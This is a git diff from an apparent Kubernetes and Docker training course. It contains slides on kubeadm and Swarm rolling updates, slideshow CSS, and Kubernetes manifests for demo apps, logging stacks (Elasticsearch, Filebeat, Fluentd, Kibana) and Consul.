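# (this prints a "kubeadm join ..." command for the other nodes)
kubeadm init

# Still on the master: make kubectl use the generated admin config
mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config

# Still on the master: install the Weave overlay network
kubectl apply -f "https://cloud.weave.works/k8s/net?k8s-version=$(kubectl version | base64 | tr -d '\n')"

# On each worker node: paste the join command printed by kubeadm init
# (MASTER_IP, TOKEN, and HASH come from that output)
kubeadm join MASTER_IP:6443 --token TOKEN --discovery-token-ca-cert-hash sha256:HASH
```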

---

## `kubeadm` drawbacks

- Doesn't set up Docker or any other container engine

- Doesn't set up the overlay network

- Scripting is complex
  <br/>
  (because extracting the token requires advanced `kubectl` commands)

- Doesn't set up multi-master (no high availability)

--

- It's still twice as many steps as setting up a Swarm cluster 😕

---

## Other deployment options

- If you are on Google Cloud:
  [GKE](https://cloud.google.com/container-engine/)

  Empirically the best Kubernetes deployment out there

- If you are on AWS:
  [kops](https://github.com/kubernetes/kops)

  ... But with AWS re:invent just around the corner, expect some changes

- On a local machine:
  [minikube](https://kubernetes.io/docs/getting-started-guides/minikube/),
  [kubespawn](https://github.com/kinvolk/kube-spawn)

  FIXME

- If you want something customizable:
  [kubicorn](https://github.com/kris-nova/kubicorn)

  Probably the closest to a multi-cloud/hybrid solution so far, but in development

- Also, many commercial options!

  FIXME

@@ -1,226 +0,0 @@
# Updating services

- We want to make changes to the web UI

- The process is as follows:

  - edit code

  - build new image

  - ship new image

  - run new image

---

## Updating a single service the hard way

- To update a single service, we could do the following:
  ```bash
  REGISTRY=localhost:5000 TAG=v0.3
  IMAGE=$REGISTRY/dockercoins_webui:$TAG
  docker build -t $IMAGE webui/
  docker push $IMAGE
  docker service update dockercoins_webui --image $IMAGE
  ```

- Make sure to tag your images properly: update the `TAG` at each iteration

  (When you check which images are running, you want these tags to be uniquely identifiable)

---

## Updating services the easy way

- With the Compose integration, all we have to do is:
  ```bash
  export TAG=v0.3
  docker-compose -f composefile.yml build
  docker-compose -f composefile.yml push
  docker stack deploy -c composefile.yml nameofstack
  ```

--

- That's exactly what we used earlier to deploy the app

- We don't need to learn new commands!

---

## Updating the web UI

- Let's make the numbers on the Y axis bigger!

.exercise[

- Edit the file `webui/files/index.html`

- Locate the `font-size` CSS attribute and increase it (at least double it)

- Save and exit

- Build, ship, and run:
  ```bash
  export TAG=v0.3
  docker-compose -f dockercoins.yml build
  docker-compose -f dockercoins.yml push
  docker stack deploy -c dockercoins.yml dockercoins
  ```

]

---

## Viewing our changes

- Wait at least 10 seconds (for the new version to be deployed)

- Then reload the web UI

- Or just mash "reload" frantically

- ... Eventually the legend on the left will be bigger!

---

## Rolling updates

- Let's change a scaled service: `worker`

.exercise[

- Edit `worker/worker.py`

- Locate the `sleep` instruction and change the delay

- Build, ship, and run our changes:
  ```bash
  export TAG=v0.4
  docker-compose -f dockercoins.yml build
  docker-compose -f dockercoins.yml push
  docker stack deploy -c dockercoins.yml dockercoins
  ```

]

---

## Viewing our update as it rolls out

.exercise[

- Check the status of the `dockercoins_worker` service:
  ```bash
  watch docker service ps dockercoins_worker
  ```

- Hide the tasks that are shutdown:
  ```bash
  watch -n1 "docker service ps dockercoins_worker | grep -v Shutdown.*Shutdown"
  ```

]

If you had stopped the workers earlier, this will automatically restart them.

By default, SwarmKit does a rolling upgrade, one instance at a time.

We should therefore see the workers being updated one by one.

---

## Changing the upgrade policy

- We can set upgrade parallelism (how many instances to update at the same time)

- And upgrade delay (how long to wait between two batches of instances)

.exercise[

- Change the parallelism to 2 and the delay to 5 seconds:
  ```bash
  docker service update dockercoins_worker \
    --update-parallelism 2 --update-delay 5s
  ```

]

The current upgrade will continue at a faster pace.
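
To double-check what the service's update policy now looks like, `docker service inspect` can display it; a quick sketch:

```bash
# Show the service definition (including update config) in human-readable form
docker service inspect --pretty dockercoins_worker
```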

---

## Changing the policy in the Compose file

- The policy can also be updated in the Compose file

- This is done by adding an `update_config` key under the `deploy` key:

  ```yaml
  deploy:
    replicas: 10
    update_config:
      parallelism: 2
      delay: 10s
  ```

---

## Rolling back

- At any time (e.g. before the upgrade is complete), we can rollback:

  - by editing the Compose file and redeploying;

  - or with the special `--rollback` flag

.exercise[

- Try to rollback the service:
  ```bash
  docker service update dockercoins_worker --rollback
  ```

]

What happens with the web UI graph?

---

## The fine print with rollback

- Rollback reverts to the previous service definition

- If we visualize successive updates as a stack:

  - it doesn't "pop" the latest update

  - it "pushes" a copy of the previous update on top

  - ergo, rolling back twice does nothing

- "Service definition" includes rollout cadence

- Each `docker service update` command = a new service definition

---

class: extra-details

## Timeline of an upgrade

- SwarmKit will upgrade N instances at a time
  <br/>(following the `update-parallelism` parameter)

- New tasks are created, and their desired state is set to `Ready`
  <br/>.small[(this pulls the image if necessary, ensures resource availability, creates the container ... without starting it)]

- If the new tasks fail to get to `Ready` state, go back to the previous step
  <br/>.small[(SwarmKit will try again and again, until the situation is addressed or desired state is updated)]

- When the new tasks are `Ready`, it sets the old tasks' desired state to `Shutdown`

- When the old tasks are `Shutdown`, it starts the new tasks

- Then it waits for the `update-delay`, and continues with the next batch of instances

@@ -1,41 +0,0 @@
## Brand new versions!

- Kubernetes 1.8
- Docker Engine 17.10
- Docker Compose 1.16

.exercise[

- Check all installed versions:
  ```bash
  kubectl version
  docker version
  docker-compose -v
  ```

]

---

class: extra-details

## Kubernetes and Docker compatibility

- Kubernetes only validates Docker Engine versions 1.11.2, 1.12.6, 1.13.1, and 17.03.2

--

class: extra-details

- Are we living dangerously?

--

class: extra-details

- "Validates" = continuous integration builds

- The Docker API is versioned, and offers strong backward-compatibility

(If a client uses e.g. API v1.25, the Docker Engine will keep behaving the same way)
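
You can see this pinning in action from the CLI; a small sketch (the `DOCKER_API_VERSION` environment variable forces the client to speak an older API version):

```bash
# Talk to the engine using API version 1.25 (Engine 1.13.x era)
DOCKER_API_VERSION=1.25 docker version
```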

@@ -1,17 +0,0 @@
## What's next?

- Stateful services (databases and the like)

  volumes, persistent volume claims, stateful sets

- Layer 7 constructs (HTTP routing)

  ingress (check traefik!)

- Logging, metrics

- Secrets, config maps

- Developer experience

- Dashboard

@@ -1,140 +0,0 @@
@import url(https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz);
@import url(https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic);
@import url(https://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700,400italic);

/* For print! Borrowed from https://github.com/gnab/remark/issues/50 */
@page {
  size: 1210px 681px;
  margin: 0;
}

@media print {
  .remark-slide-scaler {
    width: 100% !important;
    height: 100% !important;
    transform: scale(1) !important;
    top: 0 !important;
    left: 0 !important;
  }
}

/* put slide numbers in top-right corner instead of bottom-right */
div.remark-slide-number {
  top: 6px;
  left: unset;
  bottom: unset;
  right: 6px;
}

body { font-family: 'Droid Serif'; }

h1, h2, h3 {
  font-family: 'Yanone Kaffeesatz';
  font-weight: normal;
  margin-top: 0.5em;
}

a {
  text-decoration: none;
  color: blue;
}

.remark-slide-content { padding: 1em 2.5em 1em 2.5em; }
.remark-slide-content { font-size: 25px; }
.remark-slide-content h1 { font-size: 50px; }
.remark-slide-content h2 { font-size: 50px; }
.remark-slide-content h3 { font-size: 25px; }

.footnote {
  position: absolute;
  bottom: 3em;
}

.remark-code { font-size: 25px; }
.small .remark-code { font-size: 16px; }
.remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
.remark-inline-code {
  background-color: #ccc;
}

.red { color: #fa0000; }
.gray { color: #ccc; }
.small { font-size: 70%; }
.big { font-size: 140%; }
.underline { text-decoration: underline; }
.strike { text-decoration: line-through; }

.pic {
  vertical-align: middle;
  text-align: center;
  padding: 0 0 0 0 !important;
}
img {
  max-width: 100%;
  max-height: 550px;
}
.title {
  vertical-align: middle;
  text-align: center;
}
.title h1 { font-size: 5em; }
.title p { font-size: 3em; }

.quote {
  background: #eee;
  border-left: 10px solid #ccc;
  margin: 1.5em 10px;
  padding: 0.5em 10px;
  quotes: "\201C""\201D""\2018""\2019";
  font-style: italic;
}
.quote:before {
  color: #ccc;
  content: open-quote;
  font-size: 4em;
  line-height: 0.1em;
  margin-right: 0.25em;
  vertical-align: -0.4em;
}
.quote p {
  display: inline;
}

.blackbelt {
  background-image: url("blackbelt.png");
  background-size: 1.5em;
  background-repeat: no-repeat;
  padding-left: 2em;
}
.warning {
  background-image: url("warning.png");
  background-size: 1.5em;
  background-repeat: no-repeat;
  padding-left: 2em;
}
.exercise {
  background-color: #eee;
  background-image: url("keyboard.png");
  background-size: 1.4em;
  background-repeat: no-repeat;
  background-position: 0.2em 0.2em;
  border: 2px dotted black;
}
.exercise:before {
  content: "Exercise";
  margin-left: 1.8em;
}

li p { line-height: 1.25em; }

div.extra-details {
  background-image: url(extra-details.png);
  background-position: 0.5% 1%;
  background-size: 4%;
}

/* This is used only for the history slide (the only table in this doc) */
td {
  padding: 0.1em 0.5em;
  background: #eee;
}
@@ -2,14 +2,14 @@ version: "2"

 services:
   elasticsearch:
-    image: elasticsearch
+    image: elasticsearch:2
     # If you need to access ES directly, just uncomment those lines.
     #ports:
     #  - "9200:9200"
     #  - "9300:9300"

   logstash:
-    image: logstash
+    image: logstash:2
     command: |
       -e '
       input {
@@ -47,7 +47,7 @@ services:
         - "12201:12201/udp"

   kibana:
-    image: kibana
+    image: kibana:4
     ports:
       - "5601:5601"
     environment:

21 k8s/canary.yaml Normal file
@@ -0,0 +1,21 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: whatever
  annotations:
    traefik.ingress.kubernetes.io/service-weights: |
      whatever: 90%
      whatever-new: 10%
spec:
  rules:
  - host: whatever.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: whatever
          servicePort: 80
      - path: /
        backend:
          serviceName: whatever-new
          servicePort: 80
15 k8s/coffee-1.yaml Normal file
@@ -0,0 +1,15 @@
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  version: v1alpha1
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof

35 k8s/coffee-2.yaml Normal file
@@ -0,0 +1,35 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof
  versions:
  - name: v1alpha1
    served: true
    storage: true
    schema:
      openAPIV3Schema:
        properties:
          spec:
            required:
            - taste
            properties:
              taste:
                description: Subjective taste of that kind of coffee bean
                type: string
    additionalPrinterColumns:
    - jsonPath: .spec.taste
      description: Subjective taste of that kind of coffee bean
      name: Taste
      type: string
    - jsonPath: .metadata.creationTimestamp
      name: Age
      type: date
29 k8s/coffees.yaml Normal file
@@ -0,0 +1,29 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: arabica
spec:
  taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: robusta
spec:
  taste: stronger
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: liberica
spec:
  taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: excelsa
spec:
  taste: fruity

86 k8s/consul.yaml Normal file
@@ -0,0 +1,86 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: consul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.6"
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
28 k8s/docker-build.yaml Normal file
@@ -0,0 +1,28 @@
apiVersion: v1
kind: Pod
metadata:
  name: build-image
spec:
  restartPolicy: OnFailure
  containers:
  - name: docker-build
    image: docker
    env:
    - name: REGISTRY_PORT
      value: #"30000"
    command: ["sh", "-c"]
    args:
    - |
      apk add --no-cache git &&
      mkdir /workspace &&
      git clone https://github.com/jpetazzo/container.training /workspace &&
      docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
      docker push localhost:$REGISTRY_PORT/worker
    volumeMounts:
    - name: docker-socket
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock

160 k8s/dockercoins.yaml Normal file
@@ -0,0 +1,160 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  replicas: 1
  selector:
    matchLabels:
      app: hasher
  template:
    metadata:
      labels:
        app: hasher
    spec:
      containers:
      - image: dockercoins/hasher:v0.1
        name: hasher
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: hasher
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: redis
  name: redis
spec:
  replicas: 1
  selector:
    matchLabels:
      app: redis
  template:
    metadata:
      labels:
        app: redis
    spec:
      containers:
      - image: redis
        name: redis
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: redis
  name: redis
spec:
  ports:
  - port: 6379
    protocol: TCP
    targetPort: 6379
  selector:
    app: redis
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: rng
  name: rng
spec:
  replicas: 1
  selector:
    matchLabels:
      app: rng
  template:
    metadata:
      labels:
        app: rng
    spec:
      containers:
      - image: dockercoins/rng:v0.1
        name: rng
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: rng
  name: rng
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: rng
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: webui
  name: webui
spec:
  replicas: 1
  selector:
    matchLabels:
      app: webui
  template:
    metadata:
      labels:
        app: webui
    spec:
      containers:
      - image: dockercoins/webui:v0.1
        name: webui
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: webui
  name: webui
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: webui
  type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: worker
  name: worker
spec:
  replicas: 1
  selector:
    matchLabels:
      app: worker
  template:
    metadata:
      labels:
        app: worker
    spec:
      containers:
      - image: dockercoins/worker:v0.1
        name: worker
69 k8s/eck-cerebro.yaml Normal file
@@ -0,0 +1,69 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: cerebro
  name: cerebro
spec:
  selector:
    matchLabels:
      app: cerebro
  template:
    metadata:
      labels:
        app: cerebro
    spec:
      volumes:
      - name: conf
        configMap:
          name: cerebro
      containers:
      - image: lmenezes/cerebro
        name: cerebro
        volumeMounts:
        - name: conf
          mountPath: /conf
        args:
        - -Dconfig.file=/conf/application.conf
        env:
        - name: ELASTICSEARCH_PASSWORD
          valueFrom:
            secretKeyRef:
              name: demo-es-elastic-user
              key: elastic

---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: cerebro
  name: cerebro
spec:
  ports:
  - port: 9000
    protocol: TCP
    targetPort: 9000
  selector:
    app: cerebro
  type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: cerebro
data:
  application.conf: |
    secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"

    hosts = [
      {
        host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
        name = "demo"
        auth = {
          username = "elastic"
          password = ${?ELASTICSEARCH_PASSWORD}
        }
      }
    ]
19 k8s/eck-elasticsearch.yaml Normal file
@@ -0,0 +1,19 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
  name: demo
  namespace: eck-demo
spec:
  http:
    tls:
      selfSignedCertificate:
        disabled: true
  nodeSets:
  - name: default
    count: 1
    config:
      node.data: true
      node.ingest: true
      node.master: true
      node.store.allow_mmap: false
  version: 7.5.1
168 k8s/eck-filebeat.yaml Normal file
@@ -0,0 +1,168 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: eck-demo
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.inputs:
    - type: container
      paths:
        - /var/log/containers/*.log
      processors:
        - add_kubernetes_metadata:
            host: ${NODE_NAME}
            matchers:
            - logs_path:
                logs_path: "/var/log/containers/"

    # To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      node: ${NODE_NAME}
    #      hints.enabled: true
    #      hints.default_config:
    #        type: container
    #        paths:
    #          - /var/log/containers/*${data.kubernetes.container.id}.log

    processors:
      - add_cloud_metadata:
      - add_host_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: eck-demo
  labels:
    k8s-app: filebeat
spec:
  selector:
    matchLabels:
      k8s-app: filebeat
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      hostNetwork: true
      dnsPolicy: ClusterFirstWithHostNet
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat:7.5.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: demo-es-http
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          valueFrom:
            secretKeyRef:
              name: demo-es-elastic-user
              key: elastic
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
        - name: varlog
          mountPath: /var/log
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: varlog
        hostPath:
          path: /var/log
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: eck-demo
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: eck-demo
  labels:
    k8s-app: filebeat
---
17 k8s/eck-kibana.yaml Normal file
@@ -0,0 +1,17 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
  name: demo
spec:
  version: 7.5.1
  count: 1
  elasticsearchRef:
    name: demo
    namespace: eck-demo
  http:
    service:
      spec:
        type: NodePort
    tls:
      selfSignedCertificate:
        disabled: true
1802 k8s/eck-operator.yaml Normal file
File diff suppressed because it is too large
176 k8s/efk.yaml Normal file
@@ -0,0 +1,176 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: fluentd
  namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: fluentd
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - namespaces
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: fluentd
roleRef:
  kind: ClusterRole
  name: fluentd
  apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
  name: fluentd
  namespace: default
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: fluentd
  namespace: default
  labels:
    app: fluentd
spec:
  selector:
    matchLabels:
      app: fluentd
  template:
    metadata:
      labels:
        app: fluentd
    spec:
      serviceAccount: fluentd
      serviceAccountName: fluentd
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      containers:
      - name: fluentd
        image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
        env:
        - name: FLUENT_ELASTICSEARCH_HOST
          value: "elasticsearch"
        - name: FLUENT_ELASTICSEARCH_PORT
          value: "9200"
        - name: FLUENT_ELASTICSEARCH_SCHEME
          value: "http"
        - name: FLUENT_UID
          value: "0"
        - name: FLUENTD_SYSTEMD_CONF
          value: "disable"
        - name: FLUENTD_PROMETHEUS_CONF
          value: "disable"
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 200Mi
        volumeMounts:
        - name: varlog
          mountPath: /var/log
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      terminationGracePeriodSeconds: 30
      volumes:
      - name: varlog
        hostPath:
          path: /var/log
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: elasticsearch
  name: elasticsearch
  namespace: default
spec:
  selector:
    matchLabels:
      app: elasticsearch
  template:
    metadata:
      labels:
        app: elasticsearch
    spec:
      containers:
      - image: elasticsearch:5
        name: elasticsearch
        resources:
          limits:
            memory: 2Gi
          requests:
            memory: 1Gi
        env:
        - name: ES_JAVA_OPTS
          value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: elasticsearch
  name: elasticsearch
  namespace: default
spec:
  ports:
  - port: 9200
    protocol: TCP
    targetPort: 9200
  selector:
    app: elasticsearch
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: kibana
  name: kibana
  namespace: default
spec:
  selector:
    matchLabels:
      app: kibana
  template:
    metadata:
      labels:
        app: kibana
    spec:
      containers:
      - env:
        - name: ELASTICSEARCH_URL
          value: http://elasticsearch:9200/
        image: kibana:5
        name: kibana
        resources: {}
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: kibana
  name: kibana
  namespace: default
spec:
  ports:
  - port: 5601
    protocol: TCP
    targetPort: 5601
  selector:
    app: kibana
  type: NodePort
21 k8s/elasticsearch-cluster.yaml Normal file
@@ -0,0 +1,21 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
  name: es
spec:
  kibana:
    image: docker.elastic.co/kibana/kibana-oss:6.1.3
    image-pull-policy: Always
  cerebro:
    image: upmcenterprises/cerebro:0.7.2
    image-pull-policy: Always
  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
  image-pull-policy: Always
  client-node-replicas: 2
  master-node-replicas: 3
  data-node-replicas: 3
  network-host: 0.0.0.0
  use-ssl: false
  data-volume-size: 10Gi
  java-options: "-Xms512m -Xmx512m"

94 k8s/elasticsearch-operator.yaml Normal file
@@ -0,0 +1,94 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
  name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
  resources: ["cronjobs", "jobs"]
  verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets", "deployments"]
  verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
  resources: ["elasticsearchclusters"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: elasticsearch-operator
subjects:
- kind: ServiceAccount
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
spec:
  replicas: 1
  template:
    metadata:
      labels:
        name: elasticsearch-operator
    spec:
      containers:
      - name: operator
        image: upmcenterprises/elasticsearch-operator:0.2.0
        imagePullPolicy: Always
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 8000
          name: http
        livenessProbe:
          httpGet:
            path: /live
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 10
        readinessProbe:
          httpGet:
            path: /ready
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 5
      serviceAccount: elasticsearch-operator
167 k8s/filebeat.yaml Normal file
@@ -0,0 +1,167 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.config:
      inputs:
        # Mounted `filebeat-inputs` configmap:
        path: ${path.config}/inputs.d/*.yml
        # Reload inputs configs as they change:
        reload.enabled: false
      modules:
        path: ${path.config}/modules.d/*.yml
        # Reload module configs as they change:
        reload.enabled: false

    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      hints.enabled: true

    processors:
      - add_cloud_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-inputs
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  kubernetes.yml: |-
    - type: docker
      containers.ids:
      - "*"
      processors:
        - add_kubernetes_metadata:
            in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
spec:
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat-oss:7.0.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch-es.default.svc.cluster.local
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: inputs
          mountPath: /usr/share/filebeat/inputs.d
          readOnly: true
        - name: data
